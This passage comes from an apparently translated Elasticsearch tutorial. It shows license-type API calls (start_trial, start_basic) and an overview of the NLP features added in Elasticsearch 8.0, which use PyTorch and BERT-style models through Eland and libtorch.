"issue_date_in_millis" : 1737702624625 ,
"max_nodes" : 1000 ,
"max_resource_units" : null ,
"issued_to" : "elasticsearch" ,
"issuer" : "elasticsearch" ,
"start_date_in_millis" : -1
}
}
# Change the license type: trial
POST _license/start_trial?acknowledge=true
# Change the license type: basic
POST _license/start_basic?acknowledge=true
(5) Running SQL operations
9. Introduction to natural language processing (NLP)
(1) Overview
With the release of 8.0, Elastic is pleased to make it possible to upload PyTorch machine learning models into Elasticsearch to provide modern natural language processing (NLP) in the Elastic Stack. Elasticsearch users can now integrate one of the most popular formats for building NLP models and incorporate those models into Elasticsearch as part of an NLP data pipeline through the Inference processor.
(2) What is natural language processing
NLP refers to the ways software can be used to manipulate and understand spoken or written text, that is, natural language. In 2018 Google open-sourced a new technique for NLP pre-training called Bidirectional Encoder Representations from Transformers, or BERT. BERT makes use of "transfer learning" by training on internet-sized datasets (think of all of Wikipedia and digitized books, for example) without any human involvement. Transfer learning allows a BERT model to be pre-trained for general-purpose language understanding; once the model has been pre-trained a single time, it can be reused and fine-tuned for more specific tasks to understand how language is used. To support BERT-like models (models that use the same tokenizer as BERT), Elasticsearch will first support most of the most common NLP tasks through PyTorch model support. PyTorch is one of the most popular modern machine learning libraries, with a large active user base; it supports deep neural networks such as the Transformer architecture used by BERT. Some example NLP tasks:
Sentiment analysis: binary classification used to identify positive versus negative statements. Named entity recognition (NER): building structure from unstructured text, attempting to extract details such as names, locations or organizations. Text classification: zero-shot classification allows text to be classified according to classes of your choosing, without pre-training. Text embedding: used for k-nearest-neighbour (kNN) search.
(3) Natural language processing in Elasticsearch
When integrating NLP models into the Elastic platform, we want to provide an excellent user experience for uploading and managing models. With the Eland client for uploading PyTorch models and Kibana's ML model management UI for managing models on an Elasticsearch cluster, users can try out different models and get a good sense of how they perform on their data. We also want this to scale across the available nodes in a cluster and to deliver good inference throughput. To make all this possible, a machine learning library is needed to perform inference. Adding PyTorch support to Elasticsearch requires the native library libtorch, which underpins PyTorch, and only supports PyTorch models that have been exported or saved in the TorchScript representation. This is the representation of the model that libtorch needs, and it allows Elasticsearch to avoid running a Python interpreter.
By integrating with one of the most popular formats for building NLP models, PyTorch models, Elasticsearch can provide a platform that handles a large number of NLP tasks and use cases. Many excellent libraries exist for training NLP models, so for now that is left to other tools. Whether a model is trained with PyTorch NLP, Hugging Face Transformers or Facebook's fairseq, it can be imported into Elasticsearch and used for inference. Elasticsearch inference will initially happen only at ingest time, and may be extended in the future to perform inference at query time as well.
(4) Differences in NLP between Elasticsearch 7.x and 8.x
Elasticsearch has always been a good place to do NLP, but historically it required some processing outside Elasticsearch or writing some fairly complex plugins. With 8.0, users can now perform named entity recognition, sentiment analysis, text classification and more directly in Elasticsearch, without additional components or coding. Computing and creating vectors natively in Elasticsearch is not only a "win" for horizontal scalability (by distributing the computation across a cluster of servers); the change also saves Elasticsearch users a great deal of time and effort.
With Elastic 8.0, users can use PyTorch machine learning models (such as BERT) directly in Elasticsearch and run inference with those models inside Elasticsearch. Enabling inference directly in Elasticsearch integrates the power of modern NLP into search applications and experiences, is inherently more efficient (thanks to Elasticsearch's distributed compute), and makes NLP itself faster and easier than ever, because data no longer needs to be moved out to a separate process or system.